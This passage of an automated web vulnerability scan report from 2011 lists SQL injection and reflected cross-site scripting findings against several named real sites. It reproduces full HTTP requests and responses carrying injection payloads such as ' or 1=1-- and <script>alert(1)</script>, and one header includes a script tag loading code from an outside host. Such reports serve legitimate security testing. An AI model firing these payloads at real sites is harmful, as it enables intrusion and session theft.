<meta name="description" content="Network Presence - Australian Linux, Hosting and Internet Services!" />

<title>Cloud Plans</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link type='text/css' href='http://networkpresence.com.au/modules/mod_swmenufree/styles/menu.css' rel='stylesheet' />
<script type="text/javascript" src="http://networkpresence.com.au/modules/mod_swmenufree/transmenu_Packed.js"></script>


<link rel="shortcut icon" href="/favicon.ico">
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/aurora/css/template.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/templates/aurora/css/blue.css" type="text/css" />

<!--[if IE 6]>
<link href="/templates/aurora/css/ie6.css" rel="stylesheet" type="text/css" />
<![endif]-->

<!--[if IE 7]>
<link href="/templates/aurora/css/ie7.css" rel="stylesheet" type="text/css" />
<![endif]-->

<style type="te
...[SNIP]...

Request 2

GET /modules/mod_fpslideshow19827343'%20or%201%3d2--%20/mod_fpslideshow/templates/Uncut/template_css.php?w=520&h=308&sw=192 HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24

Response 2

HTTP/1.1 404 NOT FOUND
Date: Tue, 19 Jul 2011 02:02:50 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:02:50 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23748
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<base href="http://networkpresence.com.au/modules/mod_fpslideshow19827343' or 1=2-- /mod_fpslideshow/templates/Uncut/template_css.php" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="index, follow" />
<meta name="keywords" content="Network Presence,networkpresence.com.au,australian vps hosting,colocation,co-location,vps" />

<meta name="description" content="Network Presence - Australian Linux, Hosting and Internet Services!" />

<title>404</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<script type="text/javascript" src="/media/system/js/mootools.js"></script>
<script type="text/javascript" src="/media/system/js/caption.js"></script>
<!-- JoomlaWorks "AllVideos" Plugin (v2.5) starts here -->

<style type="text/css" media="all">
   @import "http://networkpresence.com.au/plugins/content/jw_allvideos/templates/Default/template_css.css";
</style>
       
<script type="text/javascript" src="http://networkpresence.com.au/plugins/content/jw_allvideos/players/jw_allvideos_scripts.php"></script>
       
<!-- JoomlaWorks "AllVideos" Plugin (v2.5) ends here -->
<!-- JoomlaWorks "Frontpage Slideshow" v1.7.2 starts here -->
   <link rel="stylesheet" href="http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_cs
...[SNIP]...

1.12. http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://networkpresence.com.au
Path:   /modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 87153619'%20or%201%3d1--%20 and 87153619'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /modules/mod_fpslideshow/mod_fpslideshow87153619'%20or%201%3d1--%20/templates/Uncut/template_css.php?w=520&h=308&sw=192 HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:03:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:03:25 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 37581
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<base href="http://networkpresence.com.au/index.php/component/option,com_webhosting/Itemid,58/catid,19/" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="index, follow" />
<meta name="keywords" content="Network Presence,networkpresence.com.au,australian vps hosting,colocation,co-location,vps" />
<meta name="description" content="Network Presence - Australian Linux, Hosting and Internet Services!" />

<title>Cloud Plans</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link type='text/css' href='http://networkpresence.com.au/modules/mod_swmenufree/styles/menu.css' rel='stylesheet' />
<script type="text/javascript" src="http://networkpresence.com.au/modules/mod_swmenufree/transmenu_Packed.js"></script>


<link rel="shortcut icon" href="/favicon.ico">
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/aurora/css/template.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/templates/aurora/css/blue.css" type="text/css" />

<!--[if IE 6]>
<link href="/templates/aurora/css/ie6.css" rel="stylesheet" type="text/css" />
<![endif]-->

<!--[if IE 7]>
<link href="/templates/aurora/css/ie7.css" rel="stylesheet" type="text/css" />
<![endif]-->

<style type="te
...[SNIP]...

Request 2

GET /modules/mod_fpslideshow/mod_fpslideshow87153619'%20or%201%3d2--%20/templates/Uncut/template_css.php?w=520&h=308&sw=192 HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24

Response 2

HTTP/1.1 404 NOT FOUND
Date: Tue, 19 Jul 2011 02:03:26 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:03:26 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23748
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<base href="http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow87153619' or 1=2-- /templates/Uncut/template_css.php" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="index, follow" />
<meta name="keywords" content="Network Presence,networkpresence.com.au,australian vps hosting,colocation,co-location,vps" />

<meta name="description" content="Network Presence - Australian Linux, Hosting and Internet Services!" />

<title>404</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<script type="text/javascript" src="/media/system/js/mootools.js"></script>
<script type="text/javascript" src="/media/system/js/caption.js"></script>
<!-- JoomlaWorks "AllVideos" Plugin (v2.5) starts here -->

<style type="text/css" media="all">
   @import "http://networkpresence.com.au/plugins/content/jw_allvideos/templates/Default/template_css.css";
</style>
       
<script type="text/javascript" src="http://networkpresence.com.au/plugins/content/jw_allvideos/players/jw_allvideos_scripts.php"></script>
       
<!-- JoomlaWorks "AllVideos" Plugin (v2.5) ends here -->
<!-- JoomlaWorks "Frontpage Slideshow" v1.7.2 starts here -->
   <link rel="stylesheet" href="http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_cs
...[SNIP]...

1.13. http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://networkpresence.com.au
Path:   /modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 16320573'%20or%201%3d1--%20 and 16320573'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /modules/mod_fpslideshow/mod_fpslideshow/templates16320573'%20or%201%3d1--%20/Uncut/template_css.php?w=520&h=308&sw=192 HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:03:58 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:03:59 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 37581
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<base href="http://networkpresence.com.au/index.php/component/option,com_webhosting/Itemid,58/catid,19/" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="index, follow" />
<meta name="keywords" content="Network Presence,networkpresence.com.au,australian vps hosting,colocation,co-location,vps" />
<meta name="description" content="Network Presence - Australian Linux, Hosting and Internet Services!" />

<title>Cloud Plans</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link type='text/css' href='http://networkpresence.com.au/modules/mod_swmenufree/styles/menu.css' rel='stylesheet' />
<script type="text/javascript" src="http://networkpresence.com.au/modules/mod_swmenufree/transmenu_Packed.js"></script>


<link rel="shortcut icon" href="/favicon.ico">
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/aurora/css/template.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/templates/aurora/css/blue.css" type="text/css" />

<!--[if IE 6]>
<link href="/templates/aurora/css/ie6.css" rel="stylesheet" type="text/css" />
<![endif]-->

<!--[if IE 7]>
<link href="/templates/aurora/css/ie7.css" rel="stylesheet" type="text/css" />
<![endif]-->

<style type="te
...[SNIP]...

Request 2

GET /modules/mod_fpslideshow/mod_fpslideshow/templates16320573'%20or%201%3d2--%20/Uncut/template_css.php?w=520&h=308&sw=192 HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24

Response 2

HTTP/1.1 404 NOT FOUND
Date: Tue, 19 Jul 2011 02:04:00 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:04:00 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23748
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<base href="http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates16320573' or 1=2-- /Uncut/template_css.php" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="index, follow" />
<meta name="keywords" content="Network Presence,networkpresence.com.au,australian vps hosting,colocation,co-location,vps" />

<meta name="description" content="Network Presence - Australian Linux, Hosting and Internet Services!" />

<title>404</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<script type="text/javascript" src="/media/system/js/mootools.js"></script>
<script type="text/javascript" src="/media/system/js/caption.js"></script>
<!-- JoomlaWorks "AllVideos" Plugin (v2.5) starts here -->

<style type="text/css" media="all">
   @import "http://networkpresence.com.au/plugins/content/jw_allvideos/templates/Default/template_css.css";
</style>
       
<script type="text/javascript" src="http://networkpresence.com.au/plugins/content/jw_allvideos/players/jw_allvideos_scripts.php"></script>
       
<!-- JoomlaWorks "AllVideos" Plugin (v2.5) ends here -->
<!-- JoomlaWorks "Frontpage Slideshow" v1.7.2 starts here -->
   <link rel="stylesheet" href="http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_cs
...[SNIP]...

1.14. http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://networkpresence.com.au
Path:   /modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payloads 52193765'%20or%201%3d1--%20 and 52193765'%20or%201%3d2--%20 were each submitted in the REST URL parameter 5. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut52193765'%20or%201%3d1--%20/template_css.php?w=520&h=308&sw=192 HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:04:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:04:34 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 37581
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<base href="http://networkpresence.com.au/index.php/component/option,com_webhosting/Itemid,58/catid,19/" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="index, follow" />
<meta name="keywords" content="Network Presence,networkpresence.com.au,australian vps hosting,colocation,co-location,vps" />
<meta name="description" content="Network Presence - Australian Linux, Hosting and Internet Services!" />

<title>Cloud Plans</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link type='text/css' href='http://networkpresence.com.au/modules/mod_swmenufree/styles/menu.css' rel='stylesheet' />
<script type="text/javascript" src="http://networkpresence.com.au/modules/mod_swmenufree/transmenu_Packed.js"></script>


<link rel="shortcut icon" href="/favicon.ico">
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/aurora/css/template.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/templates/aurora/css/blue.css" type="text/css" />

<!--[if IE 6]>
<link href="/templates/aurora/css/ie6.css" rel="stylesheet" type="text/css" />
<![endif]-->

<!--[if IE 7]>
<link href="/templates/aurora/css/ie7.css" rel="stylesheet" type="text/css" />
<![endif]-->

<style type="te
...[SNIP]...

Request 2

GET /modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut52193765'%20or%201%3d2--%20/template_css.php?w=520&h=308&sw=192 HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24

Response 2

HTTP/1.1 404 NOT FOUND
Date: Tue, 19 Jul 2011 02:04:35 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:04:35 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23748
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<base href="http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut52193765' or 1=2-- /template_css.php" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="index, follow" />
<meta name="keywords" content="Network Presence,networkpresence.com.au,australian vps hosting,colocation,co-location,vps" />

<meta name="description" content="Network Presence - Australian Linux, Hosting and Internet Services!" />

<title>404</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<script type="text/javascript" src="/media/system/js/mootools.js"></script>
<script type="text/javascript" src="/media/system/js/caption.js"></script>
<!-- JoomlaWorks "AllVideos" Plugin (v2.5) starts here -->

<style type="text/css" media="all">
   @import "http://networkpresence.com.au/plugins/content/jw_allvideos/templates/Default/template_css.css";
</style>
       
<script type="text/javascript" src="http://networkpresence.com.au/plugins/content/jw_allvideos/players/jw_allvideos_scripts.php"></script>
       
<!-- JoomlaWorks "AllVideos" Plugin (v2.5) ends here -->
<!-- JoomlaWorks "Frontpage Slideshow" v1.7.2 starts here -->
   <link rel="stylesheet" href="http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_cs
...[SNIP]...

2. Cross-site scripting (reflected)
There are 25 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://ad.doubleclick.net/adj/cm.ver.adhd_search/slideshow/womensymptoms [hcpage2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.ver.adhd_search/slideshow/womensymptoms

Issue detail

The value of the hcpage2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c89c3'%3balert(1)//61345588e2d was submitted in the hcpage2 parameter. This input was echoed as c89c3';alert(1)//61345588e2d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.ver.adhd_search/slideshow/womensymptoms;hcpage2=c89c3'%3balert(1)//61345588e2d HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/feeling-low-self-worth/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 424
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 19 Jul 2011 01:59:15 GMT
Expires: Tue, 19 Jul 2011 01:59:15 GMT

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3b49/0/0/%2a/v;231426503;0-0;0;65456586;3454-728/90;43051775/43069562/1;;~okv=;hcpage2=c89c3';alert(1)//61345588e2d;~aopt=2/1/ff/0;~sscs=%3fhttp://www.communityinvitations.com/html.pro?ID=1026&said=mc123&csid=hc11&pcid=HC">
...[SNIP]...

2.2. http://ad.doubleclick.net/adj/cm.ver.adhd_search/slideshow/womensymptoms [ugc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.ver.adhd_search/slideshow/womensymptoms

Issue detail

The value of the ugc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a77da'%3balert(1)//130646459df was submitted in the ugc parameter. This input was echoed as a77da';alert(1)//130646459df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.ver.adhd_search/slideshow/womensymptoms;ugc=a77da'%3balert(1)//130646459df HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/?ap=825
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 420
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 19 Jul 2011 01:58:44 GMT
Expires: Tue, 19 Jul 2011 01:58:44 GMT

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3b49/0/0/%2a/v;231426503;0-0;0;65456586;3454-728/90;43051775/43069562/1;;~okv=;ugc=a77da';alert(1)//130646459df;~aopt=2/1/ff/0;~sscs=%3fhttp://www.communityinvitations.com/html.pro?ID=1026&said=mc123&csid=hc11&pcid=HC">
...[SNIP]...

2.3. http://cdn-cms.scout.com/feeds/analyticsfeed.ashx [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn-cms.scout.com
Path:   /feeds/analyticsfeed.ashx

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload dbcf9<script>alert(1)</script>61fc8dfb92f was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/analyticsfeed.ashx?page=http%3A//www.scout.com/search.aspx%3Fs%3D143%26p%3D19%26sitesearch%3Dscout.com%26q%3D1%253CScRiPt%252Fxss%2520src%253Dhttp%253A%252F%252Fxss.cx%252Fcx.js%253F964407%253E%253C%252FScRiPt%253E&format=json&callback=$.analytics.reportdbcf9<script>alert(1)</script>61fc8dfb92f HTTP/1.1
Host: cdn-cms.scout.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scout.com/search.aspx?s=143&p=19&sitesearch=scout.com&q=1%3CScRiPt%2Fxss%20src%3Dhttp%3A%2F%2Fxss.cx%2Fcx.js%3F964407%3E%3C%2FScRiPt%3E
Cookie: __utma=202704078.1310038920.1308590023.1308597903.1310666427.3; __utmz=202704078.1310666427.3.3.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; UnicaNIODID=pRNfMHC9Ow1-XCX0Xfv; RefId=0; BrandId=0; SessionBrandId=0

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.38747
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Content-Length: 337
Date: Tue, 19 Jul 2011 12:04:59 GMT
Connection: close
Akamai: True

$.analytics.reportdbcf9<script>alert(1)</script>61fc8dfb92f({"network":"Scout","site":"www","sports":[],"categories":[],"pagetype":"Search","pagesubtype":"","author":"","dateoverride":{"rfc822":"","year":"","month":"","day":"","hour":"","minute":"","second":""
...[SNIP]...

